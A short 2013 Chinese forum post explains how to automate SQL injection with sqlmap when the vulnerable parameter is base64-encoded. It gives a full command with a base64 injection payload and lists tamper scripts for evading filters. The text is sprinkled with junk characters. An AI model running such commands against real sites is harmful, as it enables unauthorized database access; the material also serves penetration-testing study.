WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?& X* q% k+ {$ m) {# @& q
9 Z$ h. J: s9 H- t0 fsqlmap的tamper里有个base64encode.py( e- e( I3 B1 W8 h0 s1 d: u, F, F) Y
* o d5 C$ g7 C% s- t, ?2 Q4 h! p; z使用如下/ x3 x4 l' {4 x% `; z# N0 F
$ u+ c% P m* m5 ]
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs. _' @, S2 I9 w, h0 J3 ~
8 [& X# Q; g z* T- i$ a5 |* S9 E. _; A+ M
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
0 V0 f) k T, \+ u4 Z5 G* \3 P0 T$ Z8 `+ T! R* Y
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
7 K7 L+ e* n8 M$ Y
* Z- P/ q4 N4 l. o+ J$ ^. Sspace2hash.py ,对于MYSQL数据库 4.0, 5.0注入
+ U3 d4 y4 C H& L0 e$ `! x1 gspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入% ^8 o y9 j' G. h! `2 i u( b
首先确定目标数据库版本,然后选择相应的脚本。: L8 W; r* f9 q* @, Z
-v 3 --batch --tamper "space2hash.py") P. S4 a7 M8 H# o' P6 ~
- P, b+ q; I6 Y% I: j还有其他一些插件:
9 ?' t) B" R3 p8 }) q& R& yencodes编码 ——charencode.py3 u, j7 L/ _7 ]5 U
base64编码 —— base64encode.py
& O; p; u/ Y$ W; e替换空格和关键字 —— halfversionedmorekeywords.py0 i' I8 R; y! z0 ]
|
) N, a! V7 D8 o
8 [; S- T/ H1 s. z! z( K* d: {
1 S9 a# s& l( ?! u! W0 L9 H4 r3 J, I8 c8 f. U: N2 J# h: V3 P! B5 y
|
发表于 2013-11-23 15:50:45
收藏
支持
反对